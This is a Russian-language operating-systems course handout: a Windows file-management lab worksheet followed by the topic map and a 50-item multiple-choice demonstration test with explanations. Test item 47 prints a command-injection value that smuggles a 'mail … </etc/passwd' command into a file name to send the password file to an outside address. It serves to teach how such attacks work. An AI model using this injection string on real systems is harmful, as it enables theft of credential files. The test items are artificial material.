Лекция: Тематическая структура АПИМ
1. Определите величину свободного пространства на диске C:
2. Создайте на жестком диске компьютера С: в каталоге Мои документы новую папку, которую назовите своей фамилией (например, Ivanov).
3.Откройте стандартный графический редактор Windows Paint (Пуск – Программы – Стандартные – Paint).
4. Нарисуйте в этой программе любой рисунок, например Звездное небо и сохраните его в созданной папке под именем Image. Стандартное расширение файла, содержащего рисунок Paint – BMP, так что в результате файл будет называться Image.bmp.
5.Откройте текстовый редактор WordPad (Пуск – Программы – Cтандартные — WordPad), напишите любой текст (например, свою фамилию, имя, отчество), сохраните получившийся файл, как текстовый документ в той же папке под названием text.rtf.
6.Переименуйте рисунок в image.bmp.
7.Создайте в своей папке новую папку, например, Ivanov1.
8.Скопируйте в эту папку оба созданных файла (image.bmp и text.rtf).
9.Откройте оба файла, выделите в рисунке фрагмент, скопируйте и через буфер вставьте его в текстовый документ. Сохраните итоговый текст с рисунками под именем text1.rtf в первой папке.
10.Закройте все открытые вами файлы.
11.Создайте для файла text1.rtf ярлык на рабочем столе, проверьте работу ярлыка.
12.Создайте общий ZIP-архив для всех файлов.
13. Осуществите поиск файлов на диске S:, имя которых начинаются на букву в, остальные буквы и их количество не известно.
14. Осуществите поиск файлов, последние изменения которых были произведены с 1.09.2012по1.12.2012.
15. Осуществите поиск всех графических файлов с расширениемbmp
16. Откройте папкуS:\1 курс,отсортируйте ярлыки по размеру.
17. В папке S:\1 курс осуществите вывод папок и файлов в виде списка.
18. Присвойте файлу text1.rtf статус «скрытый».
19. Снимите режим отображения «скрытых» файлов (если он установлен).
20. Установите режим показа «скрытых» файлов.
20. Снимите с файла text1.rtf статус «скрытый» и назначьте статус «только для чтения». Проверьте, можно ли в таком статусе редактировать файл.
21. Откройте проводник (Пуск – Программы – Стандартные – Проводник)
22. Разверните ветки дерева папок в левой части Проводника (нажатием на «+»). Сверните ветки дерева (нажатием на « — »)
23. В Проводнике скопируйте папку Файловая система, находящуюся в папке 1 курс диска S: в созданную вами на уроке папку (например, С:\Мои документы\Ivanov)
24. Закройте все окна.
Тематическая структура АПИМ
N ДЕ | Наименование дидактической единицы ГОС | N за- да- ния | Тема задания |
Основные понятия и определения | Назначение и функции операционных систем |
Операционная среда |
Прерывания |
Процессы и потоки |
Файлы и файловые системы |
Память |
Пользователи |
Режимы работы |
Управление процессами | Концепция процесса |
Идентификатор, дескриптор и контекст процесса |
Иерархия процессов |
Диспетчеризация процессов |
Понятия приоритета и очереди процессов |
Синхронизация процессов |
Средства обработки сигналов |
Понятие событийного программирования |
Средства коммуникации процессов |
Способы реализации мультипрограммирования |
Управление памятью | Организация памяти. Адресное пространство |
Методы управления памятью |
Принципы организации виртуальной памяти |
Сегментная организация памяти |
Страничная организация памяти |
Ускорение работы страничной памяти |
Принципы замещения страниц |
Алгоритмы замещения страниц |
Управление вводом-выводом | Прерывания от внешних устройств |
Классификация устройств ввода-вывода |
Основные принципы организации ввода-вывода |
Функции супервизора ввода-вывода |
Режимы управления вводом-выводом |
Закрепление устройств, общие устройства ввода-вывода |
Основные системные таблицы ввода-вывода |
Синхронный и асинхронный ввод-вывод |
Организация внешней памяти на магнитных дисках |
Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках |
Принципы построения и классификация | Принципы построения |
Ядро и ресурсы |
Интерфейсы операционных систем |
Классификация операционных систем |
Защита от сбоев и несанкционированного доступа | Анализ угроз и уязвимостей в операционных системах |
Основы криптографии |
Механизмы защиты |
Надежные вычислительные системы |
Методы аутентификации |
Инсайдерские атаки |
Внешние атаки |
Вредоносные программы |
Троянские кони и вирусы |
Средства защиты от вредоносных программ |
Демонстрационный вариант
ЗАДАНИЕ N 1 Назначение и функции операционных систем ( — выберите один вариант ответа) Для сетевых операционных систем характерной является функция обеспечения … | 1) | прямого доступа к оперативной памяти другого компьютера | | 2) | взаимодействия связанных между собой компьютеров | 3) | обмена сигналами между выполняющимися на разных компьютерах программами | | 4) | программных каналов между разными компьютерами | | | ЗАДАНИЕ N 2 Операционная среда ( — выберите один вариант ответа) Одна операционная система может поддерживать несколько … | 1) | микропрограммных сред | | 2) | операционных систем | 3) | микропрограммных систем | | 4) | операционных сред | | Операционная система выполняет функции управления вычислительными процессами в вычислительной системе, распределяет ресурсы вычислительной системы между различными вычислительными процессами и образует программную среду, в которой выполняются прикладные программы пользователя. Такая среда называется операционной. Параллельное существование терминов “операционная система” и “операционная среда” вызвано тем, что операционная система может поддержать несколько операционных сред. | ЗАДАНИЕ N 3 Прерывания ( — выберите один вариант ответа) Термин «маскирование» означает запрет отдельных … | 1) | сигналов прерывания | | 2) | команд пользователя | 3) | процессов пользователя | | 4) | команд процессора | | | ЗАДАНИЕ N 4 Процессы и потоки ( — выберите один вариант ответа) Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные … | 1) | супервизорами | | 2) | мониторами | 3) | маркерами | | 4) | семафорами | Монитор (по Ч. Хоару) – высокоуровневая конструкция для синхронизации: многовходовый модуль, содержащий описание общих данных и операций над ними в виде процедур. Обеспечивается взаимное исключение исполнения мониторных операций. Монитор может также содержать условные переменные, для которых определены операции wait и signal для организации дополнительных очередей процессов. Рассмотрено решение задачи «обедающие философы» с использованием монитора. Описана реализация монитора и условных переменных с помощью семафоров. | | ЗАДАНИЕ N 5Файлы и файловые системы ( — выберите один вариант ответа) Относительный путь к файлу состоит из списка каталогов, которые нужно … | 1) | пройти от рабочего каталога, чтобы добраться до файла | | 2) | открыть в корневом процессе, чтобы добраться до файла | 3) | добавить в переменную PATH операционной среды | | 4) | пройти от корневого каталога, чтобы добраться до файла | | | ЗАДАНИЕ N 6 Память ( — выберите один вариант ответа) Свопингом сегментов называется перемещение … | 1) | блоков файла между каталогами файловой системы | | 2) | блоков данных между процессом и ядром операционной системы | 3) | сегментов данных между стеком и оперативной памятью | | 4) | сегментов между оперативной и внешней памятью | | | ЗАДАНИЕ N 7 Пользователи ( — выберите один вариант ответа) Идентификатор пользователя представляет собой уникальное _______ значение | 1) | составное | | 2) | символьное | 3) | вещественное | | 4) | целое | | | ЗАДАНИЕ N 8 Режимы работы ( — выберите один вариант ответа) Мультитерминальный режим работы предполагает совмещение … | 1) | привилегированного режима работы и режима пользователя | | 2) | многопроцессорного режима работы и режима ввода-вывода | 3) | диалогового режима работы и режима мультипрограммирования | | 4) | аналогового режима работы и режима микропрограммирования | | | ЗАДАНИЕ N 9 Концепция процесса ( — выберите один вариант ответа) Последовательная трансляция двух исходных программ является … | 1) | одним последовательным процессом | | 2) | двумя одинаковыми процессами | 3) | двумя разными процессами | | 4) | одной последовательной задачей | | | ЗАДАНИЕ N 10 Идентификатор, дескриптор и контекст процесса ( — выберите несколько вариантов ответа) Идентификатор процесса является частью _____________ процесса. | 1) | контекста | | 2) | типа | 3) | дескриптора | | 4) | описателя | | | ЗАДАНИЕ N 11 Иерархия процессов ( — выберите один вариант ответа) В OS UNIX каждый новый процесс может быть образован (порожден) только … | 1) | двумя из существующих процессов | | 2) | несколькими родительскими процессами | 3) | четным количеством родительских процессов | | 4) | одним из существующих процессов | | | ЗАДАНИЕ N 12 Диспетчеризация процессов ( — выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в … | 1) | длительности выполнения | | 2) | очередности выполнения | 3) | скорости выполнения | | 4) | частоте выполнения | | Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых процессов в системе, определяя ее степень мультипрограммирования, т. е. количество процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т. е. среднее количество процессов в компьютере не меняется, то новые процессы могут появляться только после завершения ранее загруженных. Поэтому долгосрочное планирование осуществляется достаточно редко. | ЗАДАНИЕ N 13 Понятия приоритета и очереди процессов ( — выберите один вариант ответа) Приоритет, меняющейся во время исполнения процесса, называется _____________ приоритетом. | 1) | фиксированным | | 2) | циклическим | 3) | статическим | | 4) | динамическим | | | ЗАДАНИЕ N 14 Синхронизация процессов ( — выберите один вариант ответа) При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в … | 1) | адаптации | | 2) | синхронизации | 3) | оптимизации | | 4) | буферизации | | | ЗАДАНИЕ N 15 Средства обработки сигналов ( — выберите один вариант ответа) В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между … | 1) | процессами | | 2) | процессорами | 3) | сегментами | | 4) | каналами | | | ЗАДАНИЕ N 16 Понятие событийного программирования ????? ( — выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают … | 1) | трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы | | 2) | возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы | 3) | необходимость использования графа перехода между состояниями | | 4) | неудобство использования графа переходов между состояниями | | | ЗАДАНИЕ N 17 Средства коммуникации процессов ( — выберите один вариант ответа) Два параллельных процесса могут быть … | 1) | взаимоисключающими | | 2) | независимыми | 3) | критическими | | 4) | коммутационными | | | ЗАДАНИЕ N 18 Способы реализации мультипрограммирования ( — выберите один вариант ответа) Главной целью мультипрограммирования в системах пакетной обработки является … | 1) | обеспечение удобства работы пользователей | | 2) | минимизация простоев всех устройств компьютера | 3) | минимизация времени выполнения одной задачи | | 4) | обеспечение реактивности системы | | | ЗАДАНИЕ N 19Организация памяти. Адресное пространство ( — выберите один вариант ответа) Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет … | 1) | находить в памяти наиболее долго занятые участки | | 2) | выделять участки памяти произвольных размеров | 3) | освобождать память, занятую неактивными процессами | | 4) | перемещать процессы в памяти | | | ЗАДАНИЕ N 20 Методы управления памятью ( — выберите один вариант ответа) Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти | 1) | аварийному завершению | | 2) | ускорению | 3) | замедлению выполнения | | 4) | перезапуску | | | ЗАДАНИЕ N 21 Принципы организации виртуальной памяти ( — выберите несколько вариантов ответа) Виртуальная память позволяет … | 1) | отказаться от предоставления прикладным процессам оперативной памяти | | 2) | загружать множество небольших программ, суммарный объем которых больше объема физической памяти | 3) | загружать программы, размер которых превышает объем доступной физической памяти | | 4) | загружать программы, скомпилированные для другого процессора | | | ЗАДАНИЕ N 22 Сегментная организация памяти ( — выберите один вариант ответа) Сегментная организация памяти … отдельно скомпилированных процедур. | 1) | состоит из | | 2) | упрощает компоновку | 3) | невозможна без | | 4) | усложняет компоновку | | Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами. К ним относятся: простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегмента); | ЗАДАНИЕ N 23 Страничная организация памяти ( — выберите один вариант ответа) При страничной организации памяти таблица страниц может размещаться в … | 1) | только в оперативной памяти | | 2) | в оперативной памяти и на диске | 3) | только в процессоре | | 4) | в специальной быстрой памяти процессора и в оперативной памяти | | | ЗАДАНИЕ N 24 Ускорение работы страничной памяти ( — выберите один вариант ответа) Страничная организация предназначена для … | 1) | облегчения совместного использования процедур, библиотек и массивов данных | | 2) | повышения уровня защиты программ и данных | 3) | получения большого адресного пространства без приобретения дополнительной физической памяти | | 4) | логического разделения программ и данных | | | ЗАДАНИЕ N 25 Принципы замещения страниц ( — выберите один вариант ответа) При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна … | 1) | выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске | | 2) | выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения | 3) | выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске | | 4) | выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц | | | ЗАДАНИЕ N 26 Алгоритмы замещения страниц ( — выберите один вариант ответа) Полная реализация алгоритма LRU (Least Recently Used) … | 1) | теоретически невозможна | | 2) | возможна при использовании стековой организации таблицы страниц | 3) | возможна при условии построения таблицы страниц в виде бинарных деревьев | | 4) | практически невозможна | | LRU — хороший, но труднореализуемый алгоритм. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут хранится недавно использованные страницы. Причем этот список должен обновляться при каждом обращении к памяти. Много времени нужно и на поиск страниц в таком списке. | ЗАДАНИЕ N 27 Прерывания от внешних устройств ( — выберите один вариант ответа) Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода. | 1) | контроллер | | 2) | диспетчер | 3) | супервизор | | 4) | процессор | | супервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы | ЗАДАНИЕ N 28 Классификация устройств ввода-вывода ( — выберите один вариант ответа) Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода. | 1) | позиционируемым | | 2) | символьным | 3) | адресуемым | | 4) | блочным | | Другой тип устройств ввода-вывода — символьные устройства. Они выдают или воспринимают поток символов, не относящийся ни к какой блочной структуре. Они не являются адресуемыми и не имеют никакой операции позиционирования. В качестве символьных устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя) | ЗАДАНИЕ N 29 Основные принципы организации ввода-вывода ( — выберите один вариант ответа) Любые операции по управлению вводом-выводом объявляются … | 1) | привилегированными | | 2) | универсальными | 3) | приоритетными | | 4) | уникальными | | | ЗАДАНИЕ N 30 Функции супервизора ввода-вывода ( — выберите один вариант ответа) Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор … | 1) | супервизору прерываний | | 2) | диспетчеру задач | 3) | задаче пользователя | | 4) | супервизору программ | | | ЗАДАНИЕ N 31 Режимы управления вводом-выводом ( — выберите один вариант ответа) В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора. | 1) | рационально время | | 2) | нерационально память | 3) | нерационально время | | 4) | рационально память | | | ЗАДАНИЕ N 32 Закрепление устройств, общие устройства ввода-вывода ( — выберите один вариант ответа) Понятия «виртуального устройства» по отношению к понятию «спулинга» … | 1) | соотносится как часть и целое | | 2) | является более широким | 3) | является более узким | | 4) | тождественно | | | ЗАДАНИЕ N 33 Основные системные таблицы ввода-вывода ( — выберите один вариант ответа) Каждый элемент таблицы оборудования условно называется … | 1) | UCB | | 2) | USB | 3) | DCB | | 4) | DRT | | Каждая ОС имеет свои таблицы ввода/вывода, их состав (количество и назначение каждой таблицы) может сильно отличаться. Первая таблица содержит информацию обо всех устройствах ввода/вывода, подключенных к вычислительной системе,- таблица оборудования (equipment table), а каждый элемент этой таблицы называется UCB (unit control block, блок управления устройством ввода/вывода). Вторая таблица предназначена для реализации принципа виртуализации устройств ввода/вывода – независимости от устройства. Действительное устройство, которое сопоставляется виртуальному (логическому), выбирается супервизором с помощью таблицы описания виртуальных логических устройств (DRT, device reference table). Назначение этой второй таблицы – установление связи между виртуальными (логическими) устройствами и реальными устройствами, описанными посредством первой таблицы оборудования. | ЗАДАНИЕ N 34 Синхронный и асинхронный ввод-вывод ( — выберите один вариант ответа) Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод. | 1) | асинхронный | | 2) | приоритетный | 3) | автоматический | | 4) | синхронный | | | ЗАДАНИЕ N 35 Организация внешней памяти на магнитных дисках ( — выберите один вариант ответа) Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком. | 1) | системным | | 2) | внесистемным | 3) | начальным | | 4) | локальным | | На жестком диске по физическому адресу 0-0-1 располагается главная загрузочная запись (master boot record, MBR). В состав MBR входят: — внесистемный загрузчик (non-system bootstrap — NSB); — таблица описания разделов диска (таблица разделов, partition table, PT). | ЗАДАНИЕ N 36 Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках ( — выберите один вариант ответа) Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной … | 1) | кластеризации | | 2) | буферизации | 3) | диспетчеризации | | 4) | приоритезации | | | ЗАДАНИЕ N 37 Принципы построенияОС ( — выберите один вариант ответа) Операционная система реального времени должна обеспечивать … | 1) | делегирование полномочий | | 2) | наследование приоритетов | 3) | пакетную обработку | | 4) | клонирование пользователей | | Требования, предъявляемые к среде исполнения систем реального времени, следующие: — ядро с приоритетом на обслуживание прерывания. Приоритет на прерывание означает, что готовый к запуску процесс, обладающий некоторым приоритетом, обязательно имеет преимущество в очереди по отношению к процессу с более низким приоритетом, быстро заменяет последний и поступает на выполнение. Ядро заканчивает любую сервисную работу, как только поступает задача с высшим приоритетом. — диспетчер с приоритетом — дает возможность разработчику прикладной программы присвоить каждому загрузочному модулю приоритет, неподвластный системе. Присвоение приоритетов используется для определения очередности запуска программ, готовых к исполнению. Диспетчеризация, в основу которой положен принцип присвоения приоритета, и наличие ядра с приоритетом на прерывание позволяют. Если наступает событие с высшим приоритетом, система прекращает обработку задачи с низшим приоритетом и отвечает на вновь поступивший запрос. Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ - ОС должна быть многозадачной и допускающей вытеснение (preemptable),
- ОС должна обладать понятием приоритета для потоков,
- ОС должна поддерживать предсказуемые механизмы синхронизации,
- ОС должна обеспечивать механизм наследования приоритетов,
| ЗАДАНИЕ N 38 Ядро и ресурсы ( — выберите один вариант ответа) К невыгружаемым относятся такие ресурсы, которые не могут быть … | 1) | загружены в память | | 2) | выгружены из памяти | 3) | отобраны у процесса | | 4) | отобраны у процессора | | Выгружаемый ресурс — этот ресурс безболезненно можно забрать у процесса (например: память). Невыгружаемый ресурс — этот ресурс нельзя забрать у процесса без потери данных (например: принтер). | ЗАДАНИЕ N 39 Интерфейсы операционных систем ( — выберите один вариант ответа) Интерфейс прикладного программирования предназначен для использования прикладными программами … | 1) | системных ресурсов компьютера | | 2) | регистров общего назначения процессора | 3) | интерпретатора команд пользователя | | 4) | адресного пространства процесса | | Практически все операционные системы имеют API, с помощью которого программисты могут создавать приложения для этой операционной системы. Главный API операционных систем — это множество системных вызовов. | ЗАДАНИЕ N 40 Классификация операционных систем( — выберите несколько вариантов ответа) По режиму обработки задач различают операционные системы, обеспечивающие _________ режим | 1) | мультипрограммный | | 2) | виртуальный | 3) | однопрограммный | | 4) | многопользовательский | | | ЗАДАНИЕ N 41 Анализ угроз и уязвимостей в операционных системах ( — выберите один вариант ответа) Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц. | 1) | вызова утилит операционной системы | | 2) | диспетчера приложений | 3) | вредоносных программ | | 4) | подбора пароля | | ботнет или зомби-сеть – это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя. | ЗАДАНИЕ N 42 Основы криптографии ( — выберите один вариант ответа) Недостаток систем шифрования с секретным ключом состоит в том, что … | 1) | отправитель сообщения не может его расшифровать | | 2) | отправитель и получатель должны иметь общий секретный ключ | 3) | объем вычислений при дешифровании намного больше, чем при шифровании | | 4) | объем вычислений при шифровании намного больше, чем при дешифровании | | Эффективность систем с секретным ключом обусловлена вполне приемлемым объемом вычислений, необходимых для шифрования или дешифрования сообщения, но у них имеется серьезный недостаток: и отправитель, и получатель должны владеть общим секретным ключом | ЗАДАНИЕ N 43 Механизмы защиты ( — выберите один вариант ответа) Объектами защиты в компьютерных системах могут быть … | ВАРИАНТЫ ОТВЕТОВ: 1) | устройства отображения информации | | 2) | помещения | 3) | сотрудники | | 4) | программы | | Объект защиты — информация, носитель информации или информационный процесс, в отношении которых необходимо обеспечивать защиту в соответствии с поставленной целью защиты информации. | ЗАДАНИЕ N 44 Надежные вычислительные системы ( — выберите один вариант ответа) Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на… | ВАРИАНТЫ ОТВЕТОВ: 1) | пользователей | | 2) | прикладную программу | 3) | операционную систему | | 4) | руководителей подразделений | | | ЗАДАНИЕ N 45 Методы аутентификации ( — выберите один вариант ответа) Защита зашифрованных паролей в UNIX взламывается путем … | 1) | шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей | | 2) | привлечения инсайдеров в качестве сообщников | 3) | расшифровки всех паролей после копирования файла паролей | | 4) | вычисления пароля путем свертки идентификатора пользователя | | | ЗАДАНИЕ N 46 Инсайдерские атаки ( — выберите один вариант ответа) Лазейки в программах создаются … | 1) | для облегчения отладки программ или в противоправных целях | | 2) | только для противоправных целей | 3) | для внедрения в программу постороннего кода | | 4) | только для облегчения отладки программ | | Лазейки (trapdoors). Лазейка представляет собой точку входа в программу, благодаря чему открывается непосредственный доступ к некоторым системным функциям. Лазейки обычно вставляют во время проектирования системы. Системные программисты организуют их при отладке программы, но по завершении ее разработки их надо устранить. | ЗАДАНИЕ N 47 Внешние атаки ( — выберите один вариант ответа) Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система? | 1) | Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru. | | 2) | Отправит файл aaa адресату goofinator@mail.ru. | 3) | Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru. | | 4) | Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru. | | | ЗАДАНИЕ N 48 Вредоносные программы ( — выберите один вариант ответа) Наиболее популярное применение ботнетов (сети зараженных компьютеров) — это … | 1) | организация сетевых азартных игр | | 2) | распространение пиратского контента | 3) | рассылка коммерческого спама | | 4) | хищение денег с кредитных карт | | | ЗАДАНИЕ N 49 Троянские кони и вирусы ( — выберите один вариант ответа) Перезаписывающий вирус заражает исполняемую программу путем … | 1) | записи кода вируса в тело зараженной программы после каждого ее вызова | | 2) | перезаписи содержимого стека программы кодом вируса | 3) | перезаписи служебных секторов дисков | | 4) | записи вируса на место кода программы | | | ЗАДАНИЕ N 50 Средства защиты от вредоносных программ ( — выберите один вариант ответа) Обнаружить зашифрованный вирус можно… | 1) | с помощью универсальной программы дешифрования | | 2) | по характерному поведению зараженной программы при запуске | 3) | по сигнатурам кода процедур расшифровки вируса | | 4) | по изменению размера программы | | Это вирусы-партизаны, которые попав в систему, сразу не дают себя обнаружить и не вступают в активную фазу. Они выжидают нужное им время, находясь в закодированном и безвредном состоянии, при этом зачастую они остаются незамеченными сканерами антивирусов. Как только наступает благоприятное для заражения файлов время, вирусы дешифруются, выполняют свою «грязную работу» и снова кодируются. Различные методы шифрования и упаковки вредоносных программ делают даже известные вирусы не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих «замаскированных» вирусов требуется мощный механизм распаковки, который может дешифровать файлы перед их проверкой | |